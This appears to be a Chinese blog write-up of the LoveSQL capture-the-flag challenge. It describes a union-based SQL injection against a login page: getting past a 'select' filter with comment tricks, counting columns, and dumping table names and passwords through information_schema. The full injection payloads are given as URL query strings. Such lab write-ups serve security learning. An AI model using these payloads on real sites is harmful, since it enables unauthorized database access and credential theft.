19.[极客大挑战 2019]LoveSQL

发表于2019-08-05|更新于2022-01-19|CTF

|阅读量:

考察知识点：

1.union/**/select sql注入

过滤测试

虽然select被过滤但是union/**/select还可以使用

2.确定字段数

构造：

1	?username=admin&password=admin'union/**/select+null,null,null#

当null的数量为四时，报错，所以查询数据库表有四个字段

3.确定回显点

用户密码可用作回显点

\4. 暴库

![3](19.[极客大挑战 2019]LoveSQL/3.png)

5.爆表

1	/check.php?username=admin&password=admin'union//select+null,null,group_concat(table_name)//from//information_schema.columns//where/**/table_schema=database();%23

![4](19.[极客大挑战 2019]LoveSQL/4.png)

\6. 爆字段内容

1	?username=admin&password=admin'union//select+null,null,group_concat(password)//from/**/l0ve1ysq1;%23

![5](19.[极客大挑战 2019]LoveSQL/5.png)

文章作者: h11ba1

文章链接: http://example.com/2019/08/05/CTF/19.[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]LoveSQL/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 h11ba1's blog！

打赏

alipay

相关推荐

10.[网鼎杯 2018]Fakebook

13.[0CTF 2016]piapiapia

11.[极客大挑战 2019]easysql

12.[RoarCTF 2019]Easy Java

14.[极客大挑战 2019]PHP

15.[CISCN2019 华北赛区 Day1 Web1]Dropbox

评论

本地搜索